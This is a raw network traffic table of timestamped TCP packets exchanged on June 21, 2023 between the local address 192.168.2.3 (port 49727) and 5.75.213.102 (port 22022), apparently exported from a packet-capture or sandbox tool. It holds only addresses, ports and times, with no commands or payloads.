Jun 21, 2023 04:28:02.965924978 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.965971947 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.965976000 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.966017008 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.966027021 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.966063023 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.966108084 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.966120958 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.966151953 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.966157913 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.966197968 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.966242075 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.966243982 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.966289043 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.966334105 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.966346979 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.966377974 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.966423035 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.966429949 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.966469049 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.966514111 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.966525078 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.966558933 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.966562986 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.966603994 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.966649055 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.966666937 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.966694117 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.966738939 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.966746092 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.966785908 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.966831923 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.966836929 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.966886997 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.966948032 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.966991901 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.967035055 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.967044115 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.967078924 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.967124939 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.967184067 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.967228889 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.967272997 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.967283964 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.967359066 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.967411041 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.967442989 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.967505932 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.967550039 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.967556000 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.967597008 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.967600107 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.967643976 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.967649937 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.967741966 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.967797041 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.967803001 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.967850924 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.967897892 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.967901945 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.967998028 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.968030930 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.968070030 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.968081951 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.968127966 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.968132973 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.968170881 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.968214989 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.968216896 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.968307972 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.968367100 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.984781981 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.984872103 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.984994888 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.991255999 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.991354942 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.991432905 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.991466045 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.991471052 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.991504908 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.991509914 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.991524935 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.991549015 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.991592884 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.991612911 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.991631031 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.991669893 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.991681099 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.991708994 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.991749048 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.991755962 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.991786003 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.991823912 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.991837978 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.991899967 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.991947889 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.991951942 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.992012024 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.992050886 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.992067099 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.992110014 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.992149115 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.992170095 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.992187023 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.992235899 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.992239952 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.992295980 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.992320061 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.992436886 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.992491007 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.992530107 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.992681026 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.992739916 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.992773056 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.992819071 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.992862940 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.992940903 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.993017912 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.993029118 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.993089914 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.993149042 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.993191004 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.993244886 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.993303061 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.993305922 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.993387938 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.993407011 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.993428946 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.993454933 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.993525028 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.993576050 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.993582964 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.993649006 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.993700027 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.993726015 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.993782997 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.993863106 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.993865013 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.993926048 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.993944883 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.994023085 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.994049072 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.994143963 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.994172096 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.994210958 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.994221926 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.994333029 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.994365931 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.994455099 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.994463921 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.994518995 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.994532108 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.994606972 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.994657040 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.994663954 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.994724989 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.994770050 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.994787931 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.994853973 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.994903088 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.994930029 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.995024920 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.995074987 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.995090961 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.995152950 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.995210886 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.995218039 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.995285034 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.995332956 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.995347977 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.995412111 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.995465994 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.995476007 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.995518923 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.995528936 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.995564938 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.995603085 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.995614052 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.995641947 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.995666027 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.995682955 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.995707989 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.995735884 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.995759964 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.995815039 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.995815039 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.995867968 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.995902061 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.995949030 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.995956898 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.996006012 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.996049881 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.996067047 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.996067047 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.996134996 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.996157885 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.996191025 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.996206999 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.996262074 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.996289968 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.996334076 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.996339083 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.996393919 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.996443033 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.996443987 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.996459961 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.996493101 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.996496916 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.996547937 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.996582985 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.996629953 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.996651888 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.996707916 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.996725082 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.996757984 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.996762037 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.996814966 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.996865988 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.996869087 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.996942043 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.996982098 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.996992111 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.997019053 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.997056961 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.997066975 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.997112989 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.997169018 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.997174978 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.997208118 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.997246027 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.997251034 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.997282982 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.997291088 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.997319937 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.997320890 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.997334003 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.997359037 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.997369051 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.997396946 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.997433901 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.997452021 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.997473001 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.997510910 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.997519970 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.997550964 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.997555971 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.997615099 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.008246899 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.008287907 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.008304119 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.008558989 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.019937992 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.020009041 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.020049095 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.020096064 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.020103931 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.020144939 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.020150900 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.020162106 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.020210028 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.020210028 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.020287991 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.020308971 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.020349026 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.020363092 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.020414114 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.020421028 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.020468950 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.020481110 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.020529032 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.020538092 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.020584106 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.020587921 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.020637035 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.020653009 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.020694017 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.020706892 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.020737886 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.020760059 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.020792961 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.020816088 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.020831108 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.020855904 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.020868063 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.020889997 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.020905972 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.020925045 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.020946980 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.020973921 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.020986080 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.020998001 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.021025896 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.021047115 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.021064043 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.021081924 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.021101952 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.021120071 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.021140099 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.021156073 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.021178007 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.021200895 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.021215916 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.021229982 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.021254063 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.021274090 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.021291971 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.021312952 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.021330118 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.021348953 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.021367073 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.021385908 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.021404982 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.021430016 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.021442890 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.021466970 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.021482944 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.021509886 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.021541119 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.021548033 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.021568060 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.021585941 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.021609068 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.021624088 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.021650076 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.021661997 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.021682978 CEST	49727	22022	192.168.2.3	5.75.213.102
